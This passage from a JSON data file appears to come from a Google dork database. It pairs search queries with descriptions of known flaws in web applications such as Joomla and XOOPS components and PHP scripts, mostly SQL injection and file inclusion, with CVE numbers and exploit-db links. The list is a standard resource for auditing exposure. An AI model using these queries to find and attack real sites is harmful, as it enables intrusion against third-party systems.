(SQL/XSS/HTML) Injection Vulnerabilities: http://www.exploit-db.com/exploits/12746", "submited": "2010-11-15", "request": "intext:\"Designed by Spaceacre\"", "id": 3156}, {"short description": "inurl:option=com_mv_restaurantmenumanager", "long description": "Joomla component mv_restaurantmenumanager SQL injection Vulnerability: http://www.exploit-db.com/exploits/12162", "submited": "2010-11-15", "request": "inurl:option=com_mv_restaurantmenumanager", "id": 3157}, {"short description": "inurl:\"com_ajaxchat\"", "long description": "Joomla Ajax Chat 1.0 remote file inclusion - CVE: 2009-3822: http://www.exploit-db.com/exploits/9888", "submited": "2010-11-15", "request": "inurl:\"com_ajaxchat\"", "id": 3158}, {"short description": "Powered by: AIH v2.3", "long description": "Advanced Image Hosting (AIH) 2.3 (gal) Blind SQL Injection Vuln - CVE: 2009-1032: http://www.exploit-db.com/exploits/8238", "submited": "2010-11-15", "request": "Powered by: AIH v2.3", "id": 3160}, {"short description": "inurl:/macgurublog_menu/", "long description": "e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability - CVE: 2008-2455: http://www.exploit-db.com/exploits/5604", "submited": "2010-11-15", "request": "inurl:/macgurublog_menu/", "id": 3162}, {"short description": "inurl:\"?page=duyurular_detay&id=\"", "long description": "Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-4068: http://www.exploit-db.com/exploits/4224", "submited": "2010-11-15", "request": "inurl:\"?page=duyurular_detay&id=\"", "id": 3164}, {"short description": "\"X-CART. Powerful PHP shopping cart software\"", "long description": "X-Cart ? Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4907: http://www.exploit-db.com/exploits/4396", "submited": "2010-11-15", "request": "\"X-CART. 
Powerful PHP shopping cart software\"", "id": 3165}, {"short description": "This site is powered by e107, which is released under the terms of the GNU GPL License.", "long description": "e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities: http://www.exploit-db.com/exploits/12818", "submited": "2010-11-15", "request": "This site is powered by e107, which is released under the terms of the GNU GPL License.", "id": 3166}, {"short description": "\"S-CMS by matteoiamma\"", "long description": "S-CMS 2.0b3 Multiple Local File Inclusion Vulnerabilities: http://www.exploit-db.com/exploits/8913", "submited": "2010-11-15", "request": "\"S-CMS by matteoiamma\"", "id": 3167}, {"short description": "allinurl:offers.php?id=", "long description": "B2B Classic Trading Script (offers.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12532", "submited": "2010-11-15", "request": "allinurl:offers.php?id=", "id": 3168}, {"short description": "\"Powered By HASHE\"", "long description": "HASHE! 
Solutions Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/11383", "submited": "2010-11-15", "request": "\"Powered By HASHE\"", "id": 3169}, {"short description": "inurl:we_objectID=", "long description": "webEdition CMS (we_objectID) Blind SQL Injection - CVE: 2008-4154: http://www.exploit-db.com/exploits/6281", "submited": "2010-11-15", "request": "inurl:we_objectID=", "id": 3170}, {"short description": "\"2009 Jorp\"", "long description": "Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities: http://www.exploit-db.com/exploits/8752", "submited": "2010-11-15", "request": "\"2009 Jorp\"", "id": 3172}, {"short description": "Powered by Orbis CMS", "long description": "Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/9309", "submited": "2010-11-15", "request": "Powered by Orbis CMS", "id": 3174}, {"short description": "inurl:\"index.php?edicion_id=\"", "long description": "Delivering Digital Media CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12840", "submited": "2010-11-15", "request": "inurl:\"index.php?edicion_id=\"", "id": 3176}, {"short description": "inurl:\"CIHUY\"", "long description": "Joomla Component (com_joomdle) SQL Injection Vulnerability - CVE: 2010-2908: http://www.exploit-db.com/exploits/14466", "submited": "2010-11-15", "request": "inurl:\"CIHUY\"", "id": 3177}, {"short description": "\"/subcat.php?cate_id=\"", "long description": "AJ Forum 1.0 (topic_title.php) Remote SQL Injection - CVE: 2007-1295: http://www.exploit-db.com/exploits/3411", "submited": "2010-11-15", "request": "\"/subcat.php?cate_id=\"", "id": 3178}, {"short description": "Powered by Marinet", "long description": "Marinet cms SQL/XSS/HTML Injection Vulnerability: http://www.exploit-db.com/exploits/12577", "submited": "2010-11-15", "request": "Powered by Marinet", "id": 3179}, {"short description": "allinurl:clientsignup.php \"classifieds\"", "long description": 
"Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities - CVE: 2008-6530: http://www.exploit-db.com/exploits/7408", "submited": "2010-11-15", "request": "allinurl:clientsignup.php \"classifieds\"", "id": 3181}, {"short description": "Powered by TeamCal Pro", "long description": "TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities - CVE: 2007-6553: http://www.exploit-db.com/exploits/4785", "submited": "2010-11-15", "request": "Powered by TeamCal Pro", "id": 3182}, {"short description": "\"mumbo jumbo media\" + inurl:\"index.php\"", "long description": "Mumbo Jumbo Media OP4 Remote Blind SQL Injection - CVE: 2008-6477: http://www.exploit-db.com/exploits/5440", "submited": "2010-11-15", "request": "\"mumbo jumbo media\" + inurl:\"index.php\"", "id": 3188}, {"short description": "inurl:\"cal_day.php?op=day&catview=\"", "long description": "Calendarix v0.8.20071118 SQL Injection: http://www.exploit-db.com/exploits/11443", "submited": "2010-11-15", "request": "inurl:\"cal_day.php?op=day&catview=\"", "id": 3189}, {"short description": "intext:\"pLink 2.07\"", "long description": "pLink 2.07 (linkto.php id) Remote Blind SQL Injection - CVE: 2008-4357: http://www.exploit-db.com/exploits/6449", "submited": "2010-11-15", "request": "intext:\"pLink 2.07\"", "id": 3190}, {"short description": "netGitar.com - Shop v1.0", "long description": "Net Gitar Shopv1.0 DB Download Vulnerability: http://www.exploit-db.com/exploits/11016", "submited": "2010-11-15", "request": "netGitar.com - Shop v1.0", "id": 3191}, {"short description": "allinurl:fullview.php?tempid=", "long description": "Template Seller Pro 3.25 (tempid) Remote SQL Injection: http://www.exploit-db.com/exploits/12360", "submited": "2010-11-15", "request": "allinurl:fullview.php?tempid=", "id": 3192}, {"short description": "\"Powered by Scripteen Free Image Hosting Script V1.2\"", "long description": "Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber - CVE: 2008-3211: 
http://www.exploit-db.com/exploits/6070", "submited": "2010-11-15", "request": "\"Powered by Scripteen Free Image Hosting Script V1.2\"", "id": 3194}, {"short description": "allinurl:casting_view.php?adnum=", "long description": "Modelbook (casting_view.php) SQL Injection Vulnerability - CVE: 2010-1705: http://www.exploit-db.com/exploits/12443", "submited": "2010-11-15", "request": "allinurl:casting_view.php?adnum=", "id": 3195}, {"short description": "www.stwc-counter.de", "long description": "STWC-Counter", "submited": "2010-11-15", "request": "www.stwc-counter.de", "id": 3196}, {"short description": "[ Powered by: RadLance v7.5 ]", "long description": "RadLance Gold 7.5 Multiple Remote Vulnerabilities - CVE: 2009-4692: http://www.exploit-db.com/exploits/9195", "submited": "2010-11-15", "request": "[ Powered by: RadLance v7.5 ]", "id": 3197}, {"short description": "inurl:/jobsearchengine/", "long description": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14095", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 3199}, {"short description": "VevoCart Control System", "long description": "Asp VevoCart Control System Version 3.0.4 DB Download Vulnerability: http://www.exploit-db.com/exploits/11134", "submited": "2010-11-15", "request": "VevoCart Control System", "id": 3201}, {"short description": "inurl:\"com_digifolio\"", "long description": "Joomla Component com_digifolio 1.52 (id) SQL Injection Vulnerability - CVE: 2009-3193: http://www.exploit-db.com/exploits/9534", "submited": "2010-11-15", "request": "inurl:\"com_digifolio\"", "id": 3203}, {"short description": "\"index.php?option=com_resman\"", "long description": "Joomla Component Car Manager 1.1 Remote SQL Injection - CVE: 2007-1704: http://www.exploit-db.com/exploits/3564", "submited": "2010-11-15", "request": "\"index.php?option=com_resman\"", "id": 3204}, {"short description": "allinurl:offers_buy.php?id=", "long description": "EC21 Clone 3.0 
(id) SQL Injection Vulnerability - CVE: 2010-1726: http://www.exploit-db.com/exploits/12459", "submited": "2010-11-15", "request": "allinurl:offers_buy.php?id=", "id": 3205}, {"short description": "inurl:/jobsearchengine/", "long description": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14129", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 3206}, {"short description": "Powered by CMScout (c)2005 CMScout Group", "long description": "CMScout 2.08 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12407", "submited": "2010-11-15", "request": "Powered by CMScout (c)2005 CMScout Group", "id": 3207}, {"short description": "\"index.php?option=com_rwcards\"", "long description": "Joomla Component RWCards 2.4.3 Remote SQL Injection - CVE: 2007-1703: http://www.exploit-db.com/exploits/3565", "submited": "2010-11-15", "request": "\"index.php?option=com_rwcards\"", "id": 3208}, {"short description": "inurl:/jobsearchengine/", "long description": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14114", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 3209}, {"short description": "Powered by Comersus v6 Shopping Cart", "long description": "Comersus Shopping Cart v6 Remote User Pass: http://www.exploit-db.com/exploits/7736", "submited": "2010-11-15", "request": "Powered by Comersus v6 Shopping Cart", "id": 3210}, {"short description": "intext:\"Powered by Atomic Photo Album 1.1.0pre4\"", "long description": "Atomic Photo Album 1.1.0pre4 Blind SQL Injection - CVE: 2008-4335: http://www.exploit-db.com/exploits/6574", "submited": "2010-11-15", "request": "intext:\"Powered by Atomic Photo Album 1.1.0pre4\"", "id": 3211}, {"short description": "inurl:\"com_fastball\"", "long description": "Joomla Fastball component 1.1.0-1.2 SQL Injection - CVE: 2009-3443: http://www.exploit-db.com/exploits/9822", "submited": "2010-11-15", "request": 
"inurl:\"com_fastball\"", "id": 3212}, {"short description": "\"Powered by MobPartner\" inurl:\"chat.php\"", "long description": "MobPartner Chat Multiple Sql Injection Vulnerabilities: http://www.exploit-db.com/exploits/11321", "submited": "2010-11-15", "request": "\"Powered by MobPartner\" inurl:\"chat.php\"", "id": 3216}, {"short description": "[ Content Copyright 2007 RadNics Gold ]", "long description": "RadNICS Gold v5 Multiple Remote Vulnerabilities - CVE: 2009-4696: http://www.exploit-db.com/exploits/9196", "submited": "2010-11-15", "request": "[ Content Copyright 2007 RadNics Gold ]", "id": 3217}, {"short description": "\"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"", "long description": "iJoomla News Portal (Itemid) Remote SQL Injection - CVE: 2008-2676: http://www.exploit-db.com/exploits/5761", "submited": "2010-11-15", "request": "\"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"", "id": 3218}, {"short description": "Lebi soft Ziyaretci Defteri_v7.5", "long description": "Lebi soft Ziyaretci Defteri_v7.5 DB Download Vulnerabilit - CVE: 2010-1065: http://www.exploit-db.com/exploits/11015", "submited": "2010-11-15", "request": "Lebi soft Ziyaretci Defteri_v7.5", "id": 3219}, {"short description": "allinurl:offers_buy.php?id=", "long description": "Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability - CVE: 2010-1725: http://www.exploit-db.com/exploits/12468", "submited": "2010-11-15", "request": "allinurl:offers_buy.php?id=", "id": 3220}, {"short description": "[ Powered by: RadBids Gold v4 ]", "long description": "RadBIDS GOLD v4 Multiple Remote Vulnerabilities - CVE: 2009-3529: http://www.exploit-db.com/exploits/9194", "submited": "2010-11-15", "request": "[ Powered by: RadBids Gold v4 ]", "id": 3221}, {"short description": "\"/subcat.php?cate_id=\"", "long description": "AJ Auction Pro All Versions (subcat.php) Remote SQL Injection - CVE: 2007-1298: 
http://www.exploit-db.com/exploits/3408", "submited": "2010-11-15", "request": "\"/subcat.php?cate_id=\"", "id": 3222}, {"short description": "\"Desenvolvido por: Fio Mental\"", "long description": "Fiomental & Coolsis Backoffice Multi Vulnerability: http://www.exploit-db.com/exploits/12563", "submited": "2010-11-15", "request": "\"Desenvolvido por: Fio Mental\"", "id": 3223}, {"short description": "\"Powered by ProjectCMS\"", "long description": "ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability - CVE: 2009-1500: http://www.exploit-db.com/exploits/8565", "submited": "2010-11-15", "request": "\"Powered by ProjectCMS\"", "id": 3224}, {"short description": "Powered by DorsaCms", "long description": "DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6810", "submited": "2010-11-15", "request": "Powered by DorsaCms", "id": 3225}, {"short description": "powered by QT-cute v1.2", "long description": "QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12817", "submited": "2010-11-15", "request": "powered by QT-cute v1.2", "id": 3226}, {"short description": "inurl:\"/modules/friendfinder/\"", "long description": "XOOPS Module Friendfinder", "submited": "2010-11-15", "request": "inurl:\"/modules/friendfinder/\"", "id": 3227}, {"short description": "allinurl:forum_answer.php?que_id=", "long description": "AskMe Pro 2.1 (que_id) SQL Injection Vulnerability - CVE: 2007-4085: http://www.exploit-db.com/exploits/12372", "submited": "2010-11-15", "request": "allinurl:forum_answer.php?que_id=", "id": 3228}, {"short description": "1998 - 2010 Video Battle Script", "long description": "PHP Video Battle SQL Injection Vulnerability - CVE: 2010-1701: http://www.exploit-db.com/exploits/12444", "submited": "2010-11-15", "request": "1998 - 2010 Video Battle Script", "id": 3229}, {"short description": "inurl:\"com_facebook\"", "long description": "Joomla com_facebook SQL Injection 
- CVE: 2009-3438: http://www.exploit-db.com/exploits/9833", "submited": "2010-11-15", "request": "inurl:\"com_facebook\"", "id": 3230}, {"short description": "inurl:/modules/kshop/", "long description": "XOOPS Module Kshop 1.17 (id) Remote SQL Injectio - CVE: 2007-1810: http://www.exploit-db.com/exploits/3626", "submited": "2010-11-15", "request": "inurl:/modules/kshop/", "id": 3231}, {"short description": "\"Jinzora Media Jukebox\"", "long description": "Jinzora 2.7 (include_path) Multiple Remote File Include Vulnerabilities - CVE: 2006-6770: http://www.exploit-db.com/exploits/3003", "submited": "2010-11-15", "request": "\"Jinzora Media Jukebox\"", "id": 3233}, {"short description": "\"Powered by EPay Enterprise\" inurl:\"shop.htm?cid=\" | nurl:\"shop.php?cid=\"", "long description": "EPay Enterprise v4.13 (cid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12353", "submited": "2010-11-15", "request": "\"Powered by EPay Enterprise\" inurl:\"shop.htm?cid=\" | nurl:\"shop.php?cid=\"", "id": 3234}, {"short description": "\"Copyright 2004 easy-content forums\"", "long description": "Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities - CVE: 2006-2697: http://www.exploit-db.com/exploits/1834", "submited": "2010-11-15", "request": "\"Copyright 2004 easy-content forums\"", "id": 3235}, {"short description": "\"Website by WebSolutions.ca\"", "long description": "WsCMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12813", "submited": "2010-11-15", "request": "\"Website by WebSolutions.ca\"", "id": 3236}, {"short description": "inurl:/modules/tinyevent/", "long description": "XOOPS Module Tiny Event 1.01 (id) Remote SQL Injection - CVE: 2007-1811: http://www.exploit-db.com/exploits/3625", "submited": "2010-11-15", "request": "inurl:/modules/tinyevent/", "id": 3238}, {"short description": "Powered by: AIH v2.1", "long description": "Advanced Image Hosting (AIH) 2.1 Remote SQL Injection - CVE: 2008-2536: 
http://www.exploit-db.com/exploits/5601", "submited": "2010-11-15", "request": "Powered by: AIH v2.1", "id": 3239}, {"short description": "inurl:\"/modules/jobs/\"", "long description": "XOOPS Module Jobs 2.4 (cid) Remote SQL Injection - CVE: 2007-2370: http://www.exploit-db.com/exploits/3672", "submited": "2010-11-15", "request": "inurl:\"/modules/jobs/\"", "id": 3240}, {"short description": "Uploader des fichiers", "long description": "Service d'upload v1.0.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10938", "submited": "2010-11-15", "request": "Uploader des fichiers", "id": 3241}, {"short description": "[ Powered By x10media.com ]", "long description": "x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities - CVE: 2009-4730: http://www.exploit-db.com/exploits/9340", "submited": "2010-11-15", "request": "[ Powered By x10media.com ]", "id": 3242}, {"short description": "inurl:/modules/camportail/", "long description": "XOOPS Module Camportail 1.1 (camid) Remote SQL Injection - CVE: 2007-1808: http://www.exploit-db.com/exploits/3629", "submited": "2010-11-15", "request": "inurl:/modules/camportail/", "id": 3243}, {"short description": "Copyright 2007 by Horst-D. Kroller CMS: php WCMS", "long description": "php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-5185: http://www.exploit-db.com/exploits/4477", "submited": "2010-11-15", "request": "Copyright 2007 by Horst-D. 
Kroller CMS: php WCMS", "id": 3244}, {"short description": "inurl:\"com_booklibrary\"", "long description": "Joomla Book Library 1.0 file inclusion - CVE: 2009-3817: http://www.exploit-db.com/exploits/9889", "submited": "2010-11-15", "request": "inurl:\"com_booklibrary\"", "id": 3245}, {"short description": "inurl:\"/modules/myads/\"", "long description": "XOOPS Module MyAds Bug Fix 2.04jp (index.php) SQL Injection - CVE: 2007-1846: http://www.exploit-db.com/exploits/3603", "submited": "2010-11-15", "request": "inurl:\"/modules/myads/\"", "id": 3246}, {"short description": "\"Powered by Nukedit\"", "long description": "Nukedit 4.9.x Remote Create Admin Exploit - CVE: 2008-5582: http://www.exploit-db.com/exploits/5192", "submited": "2010-11-15", "request": "\"Powered by Nukedit\"", "id": 3247}, {"short description": "\"Ladder Scripts by http://www.mygamingladder.com\"", "long description": "My Gaming Ladder Combo System 7.0 Remote Code Execution - CVE: 2006-2002: http://www.exploit-db.com/exploits/1707", "submited": "2010-11-15", "request": "\"Ladder Scripts by http://www.mygamingladder.com\"", "id": 3248}, {"short description": "Powered By PHPDug version 2.0.0", "long description": "PHPDug version 2.0.0 Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/11017", "submited": "2010-11-15", "request": "Powered By PHPDug version 2.0.0", "id": 3249}, {"short description": "allinurl:show_memorial.php?id=", "long description": "Memorial Web Site Script (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12351", "submited": "2010-11-15", "request": "allinurl:show_memorial.php?id=", "id": 3250}, {"short description": "intext:Powered by Mobilelib Gold v3", "long description": "Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities - CVE: 2009-2788: http://www.exploit-db.com/exploits/9327", "submited": "2010-11-15", "request": "intext:Powered by Mobilelib Gold v3", "id": 3251}, {"short description": "\"php-addressbook\"", "long 
description": "PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities - CVE: 2008-2565: http://www.exploit-db.com/exploits/9023", "submited": "2010-11-15", "request": "\"php-addressbook\"", "id": 3252}, {"short description": "inurl:\"com_jsjobs\"", "long description": "Joomla Component com_jsjobs 1.0.5.6 SQL Injection Vulnerabilities - CVE: 2009-4599: http://www.exploit-db.com/exploits/10366", "submited": "2010-11-15", "request": "inurl:\"com_jsjobs\"", "id": 3253}, {"short description": "inurl:com_iproperty", "long description": "Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability - CVE: 2010-1721: http://www.exploit-db.com/exploits/12246", "submited": "2010-11-15", "request": "inurl:com_iproperty", "id": 3254}, {"short description": "index.php?option=com_altas", "long description": "Joomla Component altas 1.0 Multiple Remote SQL Injection: http://www.exploit-db.com/exploits/6002", "submited": "2010-11-15", "request": "index.php?option=com_altas", "id": 3255}, {"short description": "inurl:\"index.php?module=pnFlashGames\"", "long description": "PostNuke Module pnFlashGames 2.5 SQL Injection Vulnerabilities - CVE: 2008-2013: http://www.exploit-db.com/exploits/5500", "submited": "2010-11-15", "request": "inurl:\"index.php?module=pnFlashGames\"", "id": 3256}, {"short description": "Design by Satcom Co", "long description": "Eshopbuilde CMS SQL Injection Vulnerability - CVE: 2009-4155: http://www.exploit-db.com/exploits/10253", "submited": "2010-11-15", "request": "Design by Satcom Co", "id": 3257}, {"short description": "intitle:\"ppc engine admin login form\"", "long description": "PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities - CVE: 2007-0167: http://www.exploit-db.com/exploits/3104", "submited": "2010-11-15", "request": "intitle:\"ppc engine admin login form\"", "id": 3258}, {"short description": "\"powered by Albinator\"", "long description": "Albinator 2.0.6 (Config_rootdir) Remote File Inclusion - CVE: 
2006-2182: http://www.exploit-db.com/exploits/1744", "submited": "2010-11-15", "request": "\"powered by Albinator\"", "id": 3260}, {"short description": "Powered by Gbook MX v4.1.0 2003 Magtrb Soft", "long description": "Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability: http://www.exploit-db.com/exploits/10986", "submited": "2010-11-15", "request": "Powered by Gbook MX v4.1.0 2003 Magtrb Soft", "id": 3262}, {"short description": "inurl:\"/modules/library/\"", "long description": "XOOPS Module Library (viewcat.php) Remote SQL Injectio - CVE: 2007-1815: http://www.exploit-db.com/exploits/3619", "submited": "2010-11-15", "request": "inurl:\"/modules/library/\"", "id": 3263}, {"short description": "inurl:\"/modules/repository/\"", "long description": "XOOPS Module Repository (viewcat.php) Remote SQL Injection - CVE: 2007-1847: http://www.exploit-db.com/exploits/3612", "submited": "2010-11-15", "request": "inurl:\"/modules/repository/\"", "id": 3264}, {"short description": "Powered by SLAED CMS 2005-2008 SLAED. All rights reserved.", "long description": "Slaed CMS v4 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11596", "submited": "2010-11-15", "request": "Powered by SLAED CMS 2005-2008 SLAED. 
All rights reserved.", "id": 3265}, {"short description": "index.php?option=com_vr", "long description": "Joomla Component QuickTime VR 0.1 Remote SQL Injection: http://www.exploit-db.com/exploits/5994", "submited": "2010-11-15", "request": "index.php?option=com_vr", "id": 3266}, {"short description": "\"BioScripts\"", "long description": "MiniTwitter 0.2b Multiple SQL Injection Vulnerabilities - CVE: 2009-2573: http://www.exploit-db.com/exploits/8586", "submited": "2010-11-15", "request": "\"BioScripts\"", "id": 3268}, {"short description": "myAlbum-P 2.0", "long description": "XOOPS Module myAlbum-P", "submited": "2010-11-15", "request": "myAlbum-P 2.0", "id": 3270}, {"short description": "[ Software Directory Powered by SoftDirec 1.05 ]", "long description": "Soft Direct v1.05 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11189", "submited": "2010-11-15", "request": "[ Software Directory Powered by SoftDirec 1.05 ]", "id": 3271}, {"short description": "powered by vBulletin 3.8.6", "long description": "vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability: http://www.exploit-db.com/exploits/14455", "submited": "2010-11-15", "request": "powered by vBulletin 3.8.6", "id": 3272}, {"short description": "\"By Geeklog\" \"Created this page in\" +seconds +powered", "long description": "Geeklog v1.6.0sr2 - Remote File Upload: http://www.exploit-db.com/exploits/9855", "submited": "2010-11-15", "request": "\"By Geeklog\" \"Created this page in\" +seconds +powered", "id": 3274}, {"short description": "inurl:\"xampp/biorhythm.php\"", "long description": "XAMPP 1.7.3 multiple vulnerabilites: http://www.exploit-db.com/exploits/15370", "submited": "2010-11-15", "request": "inurl:\"xampp/biorhythm.php\"", "id": 3275}, {"short description": "Powered by 2532|Gigs v1.2.2", "long description": "2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities - CVE: 2008-6901: http://www.exploit-db.com/exploits/7510", "submited": "2010-11-15", "request": "Powered by 
2532|Gigs v1.2.2", "id": 3276}, {"short description": "\"Powered by bp blog 6.0\"", "long description": "BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability - CVE: 2008-2554: http://www.exploit-db.com/exploits/5705", "submited": "2010-11-15", "request": "\"Powered by bp blog 6.0\"", "id": 3277}, {"short description": "inurl:\"com_soundset\"", "long description": "Joomla CB Resume Builder SQL Injection - CVE: 2009-3645: http://www.exploit-db.com/exploits/10064", "submited": "2010-11-15", "request": "inurl:\"com_soundset\"", "id": 3278}, {"short description": "inurl:\"/modules/zmagazine/\"", "long description": "XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection - CVE: 2005-0725: http://www.exploit-db.com/exploits/3646", "submited": "2010-11-15", "request": "inurl:\"/modules/zmagazine/\"", "id": 3279}, {"short description": "Powered by iScripts eSwap.", "long description": "iScripts eSwap v2.0 sqli and xss vulnerability: http://www.exploit-db.com/exploits/13740", "submited": "2010-11-15", "request": "Powered by iScripts eSwap.", "id": 3281}, {"short description": "\"Powered by Online Grades\"", "long description": "Online Grades & Attendance 3.2.6 Multiple Local File Inclusion Vulns - CVE: 2009-2037: http://www.exploit-db.com/exploits/8853", "submited": "2010-11-15", "request": "\"Powered by Online Grades\"", "id": 3282}, {"short description": "inurl:/modules/wflinks", "long description": "XOOPS Module WF-Links 1.03 (cid) Remote SQL Injection - CVE: 2007-2373: http://www.exploit-db.com/exploits/3670", "submited": "2010-11-15", "request": "inurl:/modules/wflinks", "id": 3283}, {"short description": "inurl:\"/modules/glossaire/\"", "long description": "XOOPS Module Glossarie", "submited": "2010-11-15", "request": "inurl:\"/modules/glossaire/\"", "id": 3285}, {"short description": "index.php?option=com_is", "long description": "Joomla Component is 1.0.1 Multiple Remote SQL Injection: http://www.exploit-db.com/exploits/5995", "submited": "2010-11-15", 
"request": "index.php?option=com_is", "id": 3286}, {"short description": "inurl:\"/modules/myconference/\"", "long description": "XOOPS Module MyConference 1.0 (index.php) SQL Injection - CVE: 2007-2737: http://www.exploit-db.com/exploits/3933", "submited": "2010-11-15", "request": "inurl:\"/modules/myconference/\"", "id": 3287}, {"short description": "inurl:\"com_gameserver\"", "long description": "Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability - CVE: 2009-3063: http://www.exploit-db.com/exploits/9571", "submited": "2010-11-15", "request": "inurl:\"com_gameserver\"", "id": 3288}, {"short description": "Powered by Ninja Designs This is a port of WordPress", "long description": "Ninja Blog v4.8 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/10991", "submited": "2010-11-15", "request": "Powered by Ninja Designs This is a port of WordPress", "id": 3289}, {"short description": "inurl:com_annonces", "long description": "Joomla Component com_annonces Upload Vulnerability: http://www.exploit-db.com/exploits/13748", "submited": "2010-11-15", "request": "inurl:com_annonces", "id": 3290}, {"short description": "Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved", "long description": "VP-ASP Shopping Cart 7.0 DB Download Vulnerability: http://www.exploit-db.com/exploits/11018", "submited": "2010-11-15", "request": "Copyright 1999-2010 Rocksalt International Pty Ltd. 
All rights reserved", "id": 3294}, {"short description": "inurl:\"fclick.php?fid\"", "long description": "Fast Click (1.1.3 , 2.3.8) (show.php) Remote File Inclusion - CVE: 2006-2175: http://www.exploit-db.com/exploits/1740", "submited": "2010-11-15", "request": "inurl:\"fclick.php?fid\"", "id": 3295}, {"short description": "inurl:\"/modules/wfsection/\"", "long description": "http://www.exploit-db.com/exploits/3644", "submited": "2010-11-15", "request": "inurl:\"/modules/wfsection/\"", "id": 3296}, {"short description": "Powered by Forums W-Agora", "long description": "W-Agora v.4.2.1 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/10999", "submited": "2010-11-15", "request": "Powered by Forums W-Agora", "id": 3297}, {"short description": "intext:\"phpbb - auction\" inurl:\"auction\"", "long description": "Auction 1.3m (phpbb_root_path) Remote File Include - CVE: 2006-2245: http://www.exploit-db.com/exploits/1747", "submited": "2010-11-15", "request": "intext:\"phpbb - auction\" inurl:\"auction\"", "id": 3298}, {"short description": "\"powered by DreamAccount 3.1\"", "long description": "DreamAccount 3.1 (auth.api.php) Remote File Include - CVE: 2006-6232: http://www.exploit-db.com/exploits/1954", "submited": "2010-11-15", "request": "\"powered by DreamAccount 3.1\"", "id": 3301}, {"short description": "allinurl:\"article.download.php\"", "long description": "Star Articles 6.0 Remote File Upload Vulnerability - CVE: 2008-7076: http://www.exploit-db.com/exploits/7251", "submited": "2010-11-15", "request": "allinurl:\"article.download.php\"", "id": 3302}, {"short description": "inurl:com_jp_jobs", "long description": "Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability - CVE: 2010-1350: http://www.exploit-db.com/exploits/12191", "submited": "2010-11-15", "request": "inurl:com_jp_jobs", "id": 3304}, {"short description": "intitle:admbook intitle:version filetype:php", "long description": "Admbook 1.2.2 (X-Forwarded-For) Remote Command 
Execution - CVE: 2006-0852: http://www.exploit-db.com/exploits/1512", "submited": "2010-11-15", "request": "intitle:admbook intitle:version filetype:php", "id": 3306}, {"short description": "\"Cms.tut.su, 2009 g.\"", "long description": "CMS Chainuk 1.2 Multiple Remote Vulnerabilities - CVE: 2009-2333: http://www.exploit-db.com/exploits/9069", "submited": "2010-11-15", "request": "\"Cms.tut.su, 2009 g.\"", "id": 3307}, {"short description": "inurl:\"com_icrmbasic\"", "long description": "Joomla IRCm Basic SQL Injection: http://www.exploit-db.com/exploits/9812", "submited": "2010-11-15", "request": "inurl:\"com_icrmbasic\"", "id": 3308}, {"short description": "\"Powered By Aqua Cms\"", "long description": "Aqua CMS (username) SQL Injection Vulnerability - CVE: 2009-1317: http://www.exploit-db.com/exploits/8432", "submited": "2010-11-15", "request": "\"Powered By Aqua Cms\"", "id": 3309}, {"short description": "inurl:\"com_jbudgetsmagic\"", "long description": "Joomla com_jbudgetsmagic SQL injection vulnerability - CVE: 2009-3332: http://www.exploit-db.com/exploits/9723", "submited": "2010-11-15", "request": "inurl:\"com_jbudgetsmagic\"", "id": 3310}, {"short description": "inurl:\"com_soundset\"", "long description": "Joomla Soundset 1.0 SQL Injection - CVE: 2009-3644: http://www.exploit-db.com/exploits/10067", "submited": "2010-11-15", "request": "inurl:\"com_soundset\"", "id": 3311}, {"short description": "Powered by MyPHP Forum v3.0", "long description": "MyPHP Forum 3.0 (Final) Remote SQL Injection Vulnerability - CVE: 2008-0099: http://www.exploit-db.com/exploits/4831", "submited": "2010-11-15", "request": "Powered by MyPHP 